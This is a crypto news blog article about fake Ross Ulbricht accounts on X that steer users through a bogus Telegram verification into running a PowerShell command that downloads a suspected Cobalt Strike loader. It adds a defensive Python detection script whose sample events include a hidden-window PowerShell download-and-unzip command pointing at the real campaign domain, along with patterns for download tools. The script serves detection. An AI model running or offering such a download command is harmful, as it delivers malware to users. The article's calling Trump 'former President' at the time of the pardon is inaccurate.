Daily Crypto News & Musings

Fake Ross Ulbricht Accounts on X Lead to Malware via Telegram


Fake Ross Ulbricht Accounts Used in New Malware Campaign

Can a Silk Road founder’s pardon lead to your computer’s demise? Fake accounts impersonating Ross Ulbricht, the notorious Silk Road founder who was recently pardoned by former President Donald Trump, have surfaced on X, leading users into a sophisticated malware trap.

  • Fake Ross Ulbricht accounts on X lead to malware via Telegram
  • PowerShell scripts download harmful ZIP files
  • Cybercriminals exploit Ulbricht’s high-profile release

Ross Ulbricht, once sentenced to life in prison for creating the Silk Road—a darknet marketplace that thrived on anonymity and illegal trade—was pardoned and released on January 22, 2025. This event, celebrated within the crypto and darknet communities, quickly became a tool for deception by cybercriminals. Fake verified accounts on X, pretending to be Ulbricht, are directing users to Telegram channels where they are prompted to undergo a fake “Safeguard” identity verification process.

This verification process is a scam designed to trick users into running a PowerShell command. PowerShell, Microsoft’s task automation and configuration management framework, lets users control and automate the administration of Windows systems and applications, which is exactly why a pasted command is dangerous: whatever it does, it does with the user’s own privileges. When users run the command, it downloads a ZIP file from http://openline[.]cyou (the dot is written defanged here so the address cannot be clicked). Inside this seemingly harmless archive lurks suspected malware, including what researchers believe is a Cobalt Strike loader. Cobalt Strike is a commercial adversary-simulation framework that criminals frequently abuse; a loader is the stage that fetches and runs its implant, giving attackers remote access and a foothold for ransomware and data theft.

The campaign uses a variation of the “Click-Fix” tactic, a deceptive method that tricks users into thinking they’re completing a captcha or verification process. In simple terms, the “Click-Fix” tactic involves convincing users to click on something that appears to fix or verify an issue, but instead, it leads to malware installation. It’s a stark reminder of how swiftly cybercriminals can exploit high-profile news for deceitful purposes.
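As an added defender-side example, not code from the original article or from the researchers it cites: a small Python triage routine that scores PowerShell process-creation events for the traits this chain leaves behind (a command launched from the user’s shell, a remote download, a ZIP fetched or expanded, a hidden window) and matches the host against the published indicator. The event shape, parent names, paths and command lines are constructed samples; the only real value is the openline[.]cyou domain from the report.

```python
import re
# Added detection example (defender side). The domain is the one in the report, kept
# defanged as published; everything else below is constructed, not real telemetry.
KNOWN_BAD_DOMAINS = {"openline[.]cyou"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # pasted by a user, not run by a management tool
DOWNLOAD_CRADLE = re.compile(
    r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer|DownloadFile|DownloadString)\b", re.I)
ARCHIVE_DROP = re.compile(r"\.zip\b|Expand-Archive", re.I)
EVASION_FLAGS = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-enc\w*\s", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def refang(domain: str) -> str:
    """Turn a defanged indicator such as 'a[.]b' back into 'a.b' for comparison."""
    return domain.replace("[.]", ".").lower()

def classify(ev: dict) -> tuple:
    """Score one process-creation event (parent, image, cmdline) for ClickFix traits."""
    reasons, score = [], 0
    if ev["image"].lower() not in {"powershell.exe", "pwsh.exe"}:
        return "ok", 0, reasons
    cmd = ev["cmdline"]
    hosts = {h.lower() for h in URL_HOST.findall(cmd)}
    checks = [
        (bool(hosts & {refang(d) for d in KNOWN_BAD_DOMAINS}), 3, "known campaign domain"),
        (bool(DOWNLOAD_CRADLE.search(cmd)), 1, "remote download in command line"),
        (bool(ARCHIVE_DROP.search(cmd)), 1, "ZIP archive fetched or expanded"),
        (bool(EVASION_FLAGS.search(cmd)), 1, "hidden window or policy bypass"),
        (ev["parent"].lower() in INTERACTIVE_PARENTS, 1, "launched from the user's shell"),
    ]
    for hit, weight, why in checks:
        if hit:
            score += weight
            reasons.append(why)
    verdict = "alert" if score >= 4 else "review" if score >= 2 else "ok"
    return verdict, score, reasons

# Constructed sample events in the shape Sysmon Event ID 1 / Security 4688 provide.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://openline.cyou/CONSTRUCTED.zip '
                '-OutFile $env:TEMP\\s.zip; Expand-Archive $env:TEMP\\s.zip $env:TEMP"'},
    {"parent": "ccmexec.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://example.invalid/tools.zip -OutFile tools.zip"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev))
```

The weights are deliberately simple: only the known domain is decisive on its own, while the behavioural traits together push a pasted download-and-unzip command into the review queue without flagging routine management-tool scripts.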

For those unfamiliar, the Silk Road was Ulbricht’s brainchild—a platform on the dark web where users could buy and sell everything from narcotics to stolen data using bitcoin, showcasing the darker side of cryptocurrency’s potential for anonymity. The darknet is a hidden part of the internet accessible only through special software, allowing users to maintain their anonymity. The platform’s closure following Ulbricht’s arrest in 2013 did not end the fascination with such marketplaces, and Ulbricht’s release has reignited debates about privacy, technology, and the ethics of darknet operations.

This latest malware campaign underscores the necessity for vigilance in the crypto space, where news can be as unpredictable as the market itself. It’s a sobering reminder that while we advocate for the ideals of decentralization, privacy, and disrupting the status quo, the same tools that empower us can be weaponized against us. Yet, amidst the gloom, there’s a glimmer of hope. The very technology that enables these scams also empowers communities to fight back. From decentralized security solutions to the tireless efforts of cybersecurity researchers, such as those at vx-underground, the crypto community is well-equipped to combat these threats. While we must remain critical of the inherent risks, we can’t overlook the potential for good that these technologies offer.

As we navigate this complex landscape, let’s keep our wits sharp and our software updated. In a world where even a Silk Road founder’s pardon can be turned into a cyber weapon, staying ahead of the game isn’t just smart—it’s essential. The crypto community’s resilience offers hope while we must remain vigilant, reminding us that the fight for a secure and decentralized future is ongoing.

Key Takeaways and Questions

  • What is the purpose of the fake Ross Ulbricht accounts?

    The purpose is to capitalize on the news of Ulbricht’s release, luring users into a malware campaign.

  • How does the malware campaign operate?

    It redirects users from X to Telegram, where they’re tricked into running a PowerShell script that downloads and installs malware, potentially including a Cobalt Strike loader.

  • What is the significance of Ross Ulbricht’s pardon in relation to this campaign?

    The pardon and release of Ulbricht provided a timely news hook that cybercriminals exploited to deceive users, leveraging the high-profile nature of the event.

  • What risks do users face if they fall for this scam?

    Users risk infecting their devices with malware, which could lead to remote access by attackers, data theft, or ransomware attacks.

  • What can users do to protect themselves from such campaigns?

    Users should be cautious of clicking on links from unfamiliar sources, especially those related to high-profile news, and should avoid running unknown scripts or commands on their devices. Utilizing specialized security software can provide additional protection.

“Exploiting the news surrounding him, threat actors on X are redirecting users to a Telegram channel where they are duped into running PowerShell scripts that infect their devices with malware.”

“This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 for founding and operating the infamous dark web marketplace Silk Road.”

The crypto community’s response to such scams is a testament to the resilience and adaptability of decentralized systems. While we remain vigilant, the principles of decentralization and privacy that we champion are also our greatest assets in the ongoing battle against cyber threats.